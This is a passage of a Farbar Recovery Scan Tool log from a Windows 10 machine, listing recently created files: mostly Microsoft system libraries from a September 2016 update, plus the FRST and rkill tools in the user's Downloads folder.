21:22 - 2016-09-19 21:22 - 02400256 _____ (Farbar) C:\Users\GImagineG\Downloads\FRST64.exe 2016-09-19 21:19 - 2016-09-19 21:20 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\GImagineG\Downloads\rkill.exe 2016-09-19 15:20 - 2016-09-19 15:20 - 00000000 ____D C:\Users\GImagineG\AppData\Local\ZipScript 10 2016-09-19 14:27 - 2016-09-19 14:27 - 01130830 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI 2016-09-19 14:24 - 2016-05-25 14:31 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll 2016-09-19 14:24 - 2016-05-25 14:31 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll 2016-09-19 14:24 - 2016-05-25 14:31 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe 2016-09-19 14:24 - 2016-05-25 11:03 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll 2016-09-19 14:24 - 2016-05-25 11:03 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll 2016-09-19 14:24 - 2016-05-25 11:03 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe 2016-09-19 14:14 - 2016-09-19 14:15 - 00000000 ____D C:\sqlsv2k8 2016-09-15 05:03 - 2016-09-15 01:16 - 00000000 ___DC C:\WINDOWS\Panther 2016-09-15 05:02 - 2016-09-15 05:02 - 00000000 ____D C:\Windows.old 2016-09-15 05:01 - 2016-09-15 05:01 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 22566400 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 22218808 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 20965248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 19417088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 17187840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 13867520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 13434368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 13081088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 12345856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 12174336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 09260032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmploc.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 09260032 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmploc.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 09128448 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 08156592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 08122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 08075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 07813472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 07792640 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 07654912 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 07623680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 07468032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 07220224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 07219672 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 06653592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 06574592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanmm.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 06109184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 06043136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 05721808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 05684736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 05622600 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 05511680 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 05384192 _____ (Microsoft) C:\WINDOWS\system32\dbgeng.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 05376000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 04747776 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 04557824 _____ (Microsoft) C:\WINDOWS\SysWOW64\dbgeng.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 04148224 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 04130944 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03893376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03776512 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03617792 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 03435008 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03305984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03299328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 03245056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03116544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAJApi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03105792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 02999296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 02947072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02913104 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02852864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02846208 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02820096 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb 2016-09-15 05:01 - 2016-09-15 05:01 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb 2016-09-15 05:01 - 2016-09-15 05:01 - 02745224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02711040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02630144 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02537824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 02510848 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02485760 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d12SDKLayers.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02481768 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02446696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02424320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Perception.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02423296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAJApi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02370048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02360832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02315264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02289664 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02264064 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02256224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 02251432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02217472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02214784 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.3D.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02190688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 02183792 _____ (Microsoft Corporation) C:\WINDOWS\system32\hevcdecoder.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02166232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02143232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02107392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02095616 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2016-09-15 05:01 - 2016-09-15 05:01 - 02083840 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02049480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02026496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2016-09-15 05:01 - 2016-09-15 05:01 - 01993216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01990640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01966288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hevcdecoder.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01935360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d12SDKLayers.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01905664 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01891328 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnidui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01883784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01859264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01853232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01847048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01812480 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01780736 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01755136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceFlows.DataModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01738040 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01726976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01708544 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01707512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01690112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01637888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01595904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01570680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01557296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01555456 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01547264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01508864 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 01503032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01491968 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01472536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01469120 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01461200 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01453992 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01435896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01430208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01377008 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01362504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01349120 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2016-09-15 05:01 - 2016-09-15 05:01 - 01349120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01343928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01328128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01316352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01312768 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorDataService.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01293312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01282048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01280352 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01274712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01267504 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01264912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01220608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01217880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01176664 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01163696 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01123360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01107456 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01106944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01099616 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01082368 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01081856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01078784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01071728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01066328 _____ (Microsoft Corporation) C:\WINDOWS\system32\pidgenx.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01066104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01052672 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01046976 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi 2016-09-15 05:01 - 2016-09-15 05:01 - 01029632 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01014784 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01006080 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00996192 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi 2016-09-15 05:01 - 2016-09-15 05:01 - 00988000 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00980824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00963584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00959488 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00959104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00955520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00944640 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00942432 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi 2016-09-15 05:01 - 2016-09-15 05:01 - 00939872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pidgenx.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00936448 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00911872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll 